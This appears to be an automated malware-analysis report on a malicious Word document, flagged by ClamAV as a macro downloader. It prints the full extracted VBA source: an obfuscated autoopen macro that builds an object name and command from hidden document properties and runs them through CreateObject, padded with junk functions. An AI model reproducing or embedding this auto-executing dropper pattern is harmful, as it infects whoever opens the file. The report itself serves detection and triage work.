MALICIOUS
Risk Score: 192
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. Heuristics indicate an auto-executing macro (autoopen) that uses CreateObject to execute code. The ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0' strongly suggests downloader functionality. The VBA source is heavily obfuscated: the strings passed to CreateObject and to its .Run call are assembled at runtime from the document's custom document properties and the built-in "Comments" property, so the extracted source alone does not reveal the object name or the command it runs. The overall pattern points to a macro-based downloader, likely delivered via spearphishing.
Heuristics (8)
- ClamAV: Doc.Macro.VBSDownloader-6336817-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
  ```vb
  YTHWZxEskz = "zExwxzAP"
  CreateObject(wEYsydCMR + tkPeGAxRD("UvsbWRaZ") + tkPeGAxRD("tLPTAcsUNaN")).Run$ bxfPFxDXbd + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + pBPDRmLawT, 0
  NxgdKKUnwX = "VceynAsThL"
  ```
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  ```vb
  Sub autoopen()
  ZzdFcTUpSnH
  ```
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7822 bytes |
SHA-256: 4a6565101df3431dc2a77915e1d7c0523231c3b197d4217fe79dc21a78cc881b
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 193 of 227 identifiers look randomly generated (e.g. 'CbndMnKPgXm'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function mSctUBbwrzm()
Dim htRsxmzHY()
ydhzCwSzZNP = 3378
ReDim htRsxmzHY(3378)
htRsxmzHY(299) = VsYttgLUDNu
htRsxmzHY(1320) = sUBTxHYa
htRsxmzHY(2033) = NcrMapfswdm
htRsxmzHY(1540) = menkHnpVd
htRsxmzHY(1452) = SUttrMrVXVN
htRsxmzHY(986) = 8910
htRsxmzHY(2786) = 6228
htRsxmzHY(121) = 8204
htRsxmzHY(567) = 2643
For ydhzCwSzZNP = 2983 To 1168
htRsxmzHY(ydhzCwSzZNP) = ydhzCwSzZNP
Next
End Function
Function ceRfBYUS()
Dim gKDxgFtvDr()
apbDNpXwuGU = 1775
ReDim gKDxgFtvDr(1775)
gKDxgFtvDr(1124) = fCvpRGCZcBH
gKDxgFtvDr(168) = LunAUtbvwMU
gKDxgFtvDr(785) = FMaYCEVRdH
gKDxgFtvDr(1731) = gDrfUcuYwV
gKDxgFtvDr(610) = DaUFgxtyuXg
gKDxgFtvDr(1772) = duNzuHhAW
gKDxgFtvDr(1402) = 2754
gKDxgFtvDr(1003) = 1774
gKDxgFtvDr(469) = 5778
gKDxgFtvDr(1325) = 5522
For apbDNpXwuGU = 896 To 1182
gKDxgFtvDr(apbDNpXwuGU) = apbDNpXwuGU
Next
End Function
Function XWcwgDdHeC()
Dim cxwzRhTETKM()
LaYpYTYRZLP = 1081
ReDim cxwzRhTETKM(1081)
cxwzRhTETKM(861) = yUxySggNCE
cxwzRhTETKM(293) = KkcDLTDDA
cxwzRhTETKM(455) = 9350
cxwzRhTETKM(485) = 1971
cxwzRhTETKM(196) = 8423
cxwzRhTETKM(517) = 8819
cxwzRhTETKM(1046) = 4041
For LaYpYTYRZLP = 316 To 498
cxwzRhTETKM(LaYpYTYRZLP) = LaYpYTYRZLP
Next
End Function
Function skFHhGPFgw()
Dim WGVZwxaDdWv()
UCcuxkXC = 470
ReDim WGVZwxaDdWv(470)
WGVZwxaDdWv(103) = xcSMnhDhr
WGVZwxaDdWv(204) = FFcrKfzDC
WGVZwxaDdWv(415) = HteAPErhb
WGVZwxaDdWv(467) = 1698
WGVZwxaDdWv(314) = 8005
WGVZwxaDdWv(212) = 9581
WGVZwxaDdWv(465) = 4663
For UCcuxkXC = 219 To 104
WGVZwxaDdWv(UCcuxkXC) = UCcuxkXC
Next
End Function
Function rnKNcGMwv()
Dim XPUBHTcHVzT()
CbndMnKPgXm = 9469
ReDim XPUBHTcHVzT(9469)
XPUBHTcHVzT(7780) = tzmhdVHtPnV
XPUBHTcHVzT(5348) = heEsTytbS
XPUBHTcHVzT(8819) = 3507
XPUBHTcHVzT(2569) = 6574
XPUBHTcHVzT(7808) = 7183
XPUBHTcHVzT(6326) = 7955
For CbndMnKPgXm = 4878 To 7448
XPUBHTcHVzT(CbndMnKPgXm) = CbndMnKPgXm
Next
End Function
Function EPtgGUtU()
Dim keUGPBHtZ()
dtzzaTsrhSY = 7137
ReDim keUGPBHtZ(7137)
keUGPBHtZ(604) = ffgGegDDvY
keUGPBHtZ(2884) = sXzZKVgzf
keUGPBHtZ(5943) = AFCRcHMpS
keUGPBHtZ(6260) = TKXLSTxXUrt
keUGPBHtZ(2317) = gxLdUZfpeww
keUGPBHtZ(5775) = 4533
keUGPBHtZ(5934) = 840
keUGPBHtZ(1863) = 4124
keUGPBHtZ(2792) = 8957
keUGPBHtZ(728) = 3387
keUGPBHtZ(2301) = 5989
For dtzzaTsrhSY = 7116 To 1630
keUGPBHtZ(dtzzaTsrhSY) = dtzzaTsrhSY
Next
End Function
Sub autoopen()
ZzdFcTUpSnH
End Sub
Public Function tkPeGAxRD(UgMphfCgv)
WydvDKZmx = "FNwaFVde"
UxrsZLmsE = "YcFgPEGbZLt"
EuEkhBYKrbN = "NDsBpVUPYuF"
MXEUemYF = "BfAvyvYC"
hPfpSyLP = "mAYDhBDMGy"
RKBSeaXCE = "nmEDzYrs"
tkPeGAxRD = ActiveDocument.CustomDocumentProperties(UgMphfCgv) + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + GSkYvgGWAKd
kUGaMSPT = "sAhzyWuFGFE"
GaMkEbnF = "wzuHNPrHx"
xUwfkAyC = "dPpzsECu"
zyxAksfL = "UbsZFrpwMnu"
End Function
Public Function bxfPFxDXbd()
vygDKYTuv = "KrVVrpUEWT"
csGHdySk = "ThEYVbwLWf"
fRRNMsWGG = "YxKafpsbZ"
UVtRusuv = "zXpHUYaXFZ"
GPCYctuM = "AshWCahCV"
NGcHtWZayu = tkPeGAxRD("hkKWzTgLA") + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + tkPeGAxRD("ntuMMhpc") + tkPeGAxRD("aGnZEVzUK") + tkPeGAxRD("HZSgvhvr")
cYpYRXYDPKh = "nDuHskDW"
CMmDvVdNS = "MEPPynhy"
NTkpAavRKt = "cYwrxwMC"
tzgPxrStR = tkPeGAxRD("dcTwrGNtUB") + tkPeGAxRD("sXutsPNKt") + tkPeGAxRD("uvCAgBCPH") + tkPeGAxRD("RLPxYBms") + tkPeGAxRD("bnpNUtDM")
YKEyWgwDmSd = tzgPxrStR + NGcHtWZayu
zaGMAfTuA = "fXcnnGeEydM"
nhsDhGRKLC = "GbXGAanFY"
ttGffTSh = "PPFKTNDx"
rDHxagvMs = "tuXDERBCP"
DRrghwtT = "RGnndgALRNs"
MAadnrKbGkc = "TyfscsEC"
LUMCfdAWs = "mWuGDUWagu"
bxfPFxDXbd = YKEyWgwDmSd + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function wEYsydCMR()
wEYsydCMR = tkPeGAxRD("dzdmCAZkmD") + tkPeGAxRD("wzcDDwRWC") + tkPeGAxRD("awrkVYbYZ") + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + VNHMKmZYdG
ApZCuuXHXsb = "FhnepMzGTp"
ARwMHsgZhXU = "AcPXwcKpLYh"
zZNNzZgPcTV = "KndEWWNvC"
SbTbHMNC = "YpzALhcCh"
FXmgNMMz = "XYysGdwfX"
YaxndVdhmF = "kKzRUZTd"
vXnCXHTtH = "gEZZxMaZzBV"
End Function
Public Function ZzdFcTUpSnH()
XBcAMBkSE = "KnGHPxeTD"
BSuFATURmv = "UwfuuaXDyE"
feZbEkcCTh = "XfwYPVUh"
fzSNhzPLctW = "rfgubcBcX"
fMUdFMTtVz = "eYEtdWVX"
DvuGEUnXZTG = "ySAUmfkv"
bSNYrLUV = "ZCsXUzSpfU"
YTHWZxEskz = "zExwxzAP"
CreateObject(wEYsydCMR + tkPeGAxRD("UvsbWRaZ") + tkPeGAxRD("tLPTAcsUNaN")).Run$ bxfPFxDXbd + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + pBPDRmLawT, 0
NxgdKKUnwX = "VceynAsThL"
BnzTUABTPkB = "mRvnVfyab"
End Function
Function pMMfvFeNA()
Dim RpGtGvpVmG()
vdTHBPtvhx = 2068
ReDim RpGtGvpVmG(2068)
RpGtGvpVmG(986) = UyywdkpM
RpGtGvpVmG(202) = ZsvncbKV
RpGtGvpVmG(1793) = HRYYTAEr
RpGtGvpVmG(380) = rLNfWBKXfW
RpGtGvpVmG(559) = TThCXBzeW
RpGtGvpVmG(1587) = tYNmaxHK
RpGtGvpVmG(1436) = 7358
RpGtGvpVmG(1768) = 1254
RpGtGvpVmG(1209) = 8168
RpGtGvpVmG(1306) = 871
RpGtGvpVmG(1505) = 7166
For vdTHBPtvhx = 657 To 207
RpGtGvpVmG(vdTHBPtvhx) = vdTHBPtvhx
Next
End Function
Function aaCaBrAgzpg()
Dim PWChWYVCsA()
ZbyRNcKVhXM = 2637
ReDim PWChWYVCsA(2637)
PWChWYVCsA(2489) = DBsBTXtmh
PWChWYVCsA(215) = eXNmVtEnfWs
PWChWYVCsA(1936) = bLSNDyLG
PWChWYVCsA(1385) = VKUhwDZKSmK
PWChWYVCsA(2218) = MPAxhrWVrzM
PWChWYVCsA(2169) = yFsSvczWH
PWChWYVCsA(333) = 4407
PWChWYVCsA(130) = 5832
PWChWYVCsA(2164) = 9917
PWChWYVCsA(1634) = 3645
For ZbyRNcKVhXM = 1336 To 2454
PWChWYVCsA(ZbyRNcKVhXM) = ZbyRNcKVhXM
Next
End Function
Function NbvEGDucH()
Dim LfywBmCnT()
AeErrFgEhpL = 8564
ReDim LfywBmCnT(8564)
LfywBmCnT(3128) = pMDVpBpVR
LfywBmCnT(6410) = AbKLLdsbv
LfywBmCnT(6667) = SsEVNrycCS
LfywBmCnT(1124) = VxgPhkeBxS
LfywBmCnT(1457) = CCUMSDsYDXs
LfywBmCnT(1090) = GSdNwZDuvY
LfywBmCnT(6574) = 8992
LfywBmCnT(2847) = 5731
For AeErrFgEhpL = 8370 To 3582
LfywBmCnT(AeErrFgEhpL) = AeErrFgEhpL
Next
End Function
Function LrCsepMWn()
Dim BmcbCwkgW()
SyTNNVKh = 878
ReDim BmcbCwkgW(878)
BmcbCwkgW(497) = mCDThkhECB
BmcbCwkgW(256) = KwMdvvzx
BmcbCwkgW(874) = FNuLhPYKsXt
BmcbCwkgW(278) = 6724
BmcbCwkgW(75) = 9171
BmcbCwkgW(171) = 4276
BmcbCwkgW(312) = 7931
BmcbCwkgW(762) = 97
BmcbCwkgW(120) = 5368
For SyTNNVKh = 321 To 464
BmcbCwkgW(SyTNNVKh) = SyTNNVKh
Next
End Function
Function MKFgaHku()
Dim mHYXULzddcM()
gPkVHXCwZbn = 1289
ReDim mHYXULzddcM(1289)
mHYXULzddcM(219) = vVMxkAbF
mHYXULzddcM(141) = ScEHAKAeH
mHYXULzddcM(70) = YkBbCNsyx
mHYXULzddcM(372) = DYGNyXXwk
mHYXULzddcM(73) = bGgXGUeK
mHYXULzddcM(1049) = 267
mHYXULzddcM(960) = 3897
mHYXULzddcM(91) = 7003
mHYXULzddcM(536) = 6918
mHYXULzddcM(1231) = 6202
For gPkVHXCwZbn = 1078 To 540
mHYXULzddcM(gPkVHXCwZbn) = gPkVHXCwZbn
Next
End Function
Function xAWymPes()
Dim zHVnvmUZ()
wbMXXwgVn = 9892
ReDim zHVnvmUZ(9892)
zHVnvmUZ(1455) = PMWcBESfUy
zHVnvmUZ(212) = xBwEuGcp
zHVnvmUZ(8344) = bWMPNtKv
zHVnvmUZ(8983) = 9250
zHVnvmUZ(4057) = 9164
zHVnvmUZ(2151) = 2546
For wbMXXwgVn = 9412 To 5925
zHVnvmUZ(wbMXXwgVn) = wbMXXwgVn
Next
End Function